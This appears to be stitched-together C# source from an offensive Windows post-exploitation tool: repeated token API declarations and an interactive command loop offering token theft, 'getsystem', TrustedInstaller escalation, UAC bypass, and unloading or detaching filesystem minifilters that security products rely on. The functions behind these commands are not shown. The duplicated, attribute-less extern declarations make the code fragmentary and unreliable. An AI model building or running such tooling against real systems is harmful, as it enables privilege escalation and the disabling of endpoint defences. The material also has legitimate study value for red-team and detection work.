public static extern UInt32 NtDuplicateToken(
IntPtr ExistingTokenHandle,
Winnt.ACCESS_MASK DesiredAccess,
wudfwdm._OBJECT_ATTRIBUTES ObjectAttributes,
Boolean EffectiveOnly,
Winnt._TOKEN_TYPE TokenType,
ref IntPtr NewTokenHandle
);
public static extern UInt32 NtDuplicateToken(
IntPtr ExistingTokenHandle,
UInt32 DesiredAccess,
IntPtr ObjectAttributes,
Boolean EffectiveOnly,
Winnt._TOKEN_TYPE TokenType,
ref IntPtr NewTokenHandle
);
public static extern uint NtDuplicateToken(
IntPtr ExistingTokenHandle,
uint DesiredAccess,
IntPtr ObjectAttributes,
bool EffectiveOnly,
Winnt._TOKEN_TYPE TokenType,
ref IntPtr NewTokenHandle
);
////////////////////////////////////////////////////////////////////////////////
//https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
////////////////////////////////////////////////////////////////////////////////
public static bool GetElevationType(IntPtr hToken, out Winnt._TOKEN_TYPE tokenType)
{
int output = -1;
if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenType, ref output))
{
Misc.GetWin32Error("TokenType");
tokenType = 0;
return(false);
}
switch ((Winnt._TOKEN_TYPE)output)
{
case Winnt._TOKEN_TYPE.TokenPrimary:
Console.WriteLine("[+] Primary Token");
tokenType = Winnt._TOKEN_TYPE.TokenPrimary;
return(true);
case Winnt._TOKEN_TYPE.TokenImpersonation:
tokenType = Winnt._TOKEN_TYPE.TokenImpersonation;
if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, ref output))
{
return(false);
}
switch ((Winnt._SECURITY_IMPERSONATION_LEVEL)output)
{
case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:
Console.WriteLine("[+] Anonymous Token");
return(true);
case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:
Console.WriteLine("[+] Identification Token");
return(true);
case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:
Console.WriteLine("[+] Impersonation Token");
return(true);
case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:
Console.WriteLine("[+] Delegation Token");
return(true);
default:
Console.WriteLine("[-] Unknown Impersionation Type");
return(false);
}
default:
Console.WriteLine("[-] Unknown Type {0}", output);
tokenType = 0;
return(false);
}
}
public static extern uint NtCreateToken(
out IntPtr TokenHandle,
uint DesiredAccess,
IntPtr ObjectAttributes,
Winnt._TOKEN_TYPE TokenType,
IntPtr AuthenticationId, //From NtAllocateLocallyUniqueId
ref long ExpirationTime,
IntPtr TokenUser,
IntPtr TokenGroups,
IntPtr TokenPrivileges,
IntPtr TokenOwner,
IntPtr TokenPrimaryGroup,
IntPtr TokenDefaultDacl,
IntPtr TokenSource
);
public static extern uint NtCreateToken(
out IntPtr TokenHandle,
uint DesiredAccess,
ref wudfwdm._OBJECT_ATTRIBUTES ObjectAttributes,
Winnt._TOKEN_TYPE TokenType,
ref Winnt._LUID AuthenticationId, //From NtAllocateLocallyUniqueId
ref long ExpirationTime,
ref Ntifs._TOKEN_USER TokenUser,
ref Ntifs._TOKEN_GROUPS_DYNAMIC TokenGroups,
ref Winnt._TOKEN_PRIVILEGES_ARRAY TokenPrivileges,
ref Ntifs._TOKEN_OWNER TokenOwner,
ref Winnt._TOKEN_PRIMARY_GROUP TokenPrimaryGroup,
ref Winnt._TOKEN_DEFAULT_DACL TokenDefaultDacl,
ref Winnt._TOKEN_SOURCE TokenSource
);
public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, ref Winbase._SECURITY_ATTRIBUTES lpTokenAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, Winnt._TOKEN_TYPE TokenType, out IntPtr phNewToken);
public static extern Boolean DuplicateTokenEx(IntPtr hExistingToken, UInt32 dwDesiredAccess, IntPtr lpTokenAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, Winnt._TOKEN_TYPE TokenType, out IntPtr phNewToken);
internal void Run()
{
try
{
Console.Write(context);
String input;
if (activateTabs)
{
try
{
input = console.ReadLine();
}
catch (InvalidOperationException)
{
input = Console.ReadLine();
}
}
else
{
input = Console.ReadLine();
}
IntPtr hToken, tempToken;
hToken = tempToken = IntPtr.Zero;
kernel32.OpenProcessToken(kernel32.GetCurrentProcess(), Constants.TOKEN_ALL_ACCESS, out hToken);
switch (NextItem(ref input))
{
case "info":
if (GetProcessID(input, out processID, out command) && OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
Console.WriteLine("");
CheckPrivileges.GetTokenUser(hToken);
Console.WriteLine("");
CheckPrivileges.GetTokenOwner(hToken);
Console.WriteLine("");
CheckPrivileges.GetTokenGroups(hToken);
Console.WriteLine("");
Winnt._TOKEN_TYPE tokenType = new Winnt._TOKEN_TYPE();
CheckPrivileges.GetElevationType(hToken, out tokenType);
CheckPrivileges.PrintElevation(hToken);
break;
case "list_privileges":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.EnumerateTokenPrivileges(hToken);
break;
case "enable_privilege":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
break;
case "disable_privilege":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
break;
case "remove_privilege":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
break;
case "nuke_privileges":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.DisableAndRemoveAllTokenPrivileges(ref hToken);
break;
case "terminate":
if (GetProcessID(input, out processID, out command))
{
IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_TERMINATE, false, (UInt32)processID);
if (IntPtr.Zero == hProcess)
{
Tokens.GetWin32Error("OpenProcess");
break;
}
Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
if (!kernel32.TerminateProcess(hProcess, 0))
{
Tokens.GetWin32Error("TerminateProcess");
break;
}
Console.WriteLine("[+] Process Terminated");
}
break;
case "sample_processes":
users = Enumeration.EnumerateTokens(false);
Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
foreach (String name in users.Keys)
{
Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
}
break;
case "sample_processes_wmi":
users = Enumeration.EnumerateTokensWMI();
Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
foreach (String name in users.Keys)
{
Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
}
break;
case "find_user_processes":
processes = Enumeration.EnumerateUserProcesses(false, input);
Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
foreach (UInt32 pid in processes.Keys)
{
Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
}
break;
case "find_user_processes_wmi":
processes = Enumeration.EnumerateUserProcessesWMI(input);
Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
foreach (UInt32 pid in processes.Keys)
{
Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
}
break;
case "list_filters":
using (Filters filters = new Filters())
{
filters.First();
filters.Next();
}
break;
case "list_filter_instances":
using (FilterInstance filterInstance = new FilterInstance(NextItem(ref input)))
{
filterInstance.First();
filterInstance.Next();
}
break;
case "detach_filter":
Filters.FilterDetach(input);
break;
case "unload_filter":
Filters.Unload(NextItem(ref input));
break;
case "sessions":
Enumeration.EnumerateInteractiveUserSessions();
break;
case "getsystem":
GetSystem(input, hToken);
break;
case "gettrustedinstaller":
GetTrustedInstaller(input);
break;
case "steal_token":
StealToken(input);
break;
case "steal_pipe_token":
StealPipeToken(input);
break;
case "bypassuac":
BypassUAC(input);
break;
case "whoami":
Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
break;
case "reverttoself":
String message = advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed";
Console.WriteLine(message);
break;
case "run":
Run(input);
break;
case "runpowershell":
RunPowerShell(input);
break;
case "exit":
Environment.Exit(0);
break;
case "help":
String item = NextItem(ref input);
if ("help" != item)
{
Help(item);
}
else
{
Help();
}
break;
default:
Help();
break;
}
if (IntPtr.Zero != hToken)
{
kernel32.CloseHandle(hToken);
}
Console.WriteLine();
}
catch (Exception error)
{
Console.WriteLine(error.ToString());
Tokens.GetWin32Error("MainLoop");
}
finally
{
}
}
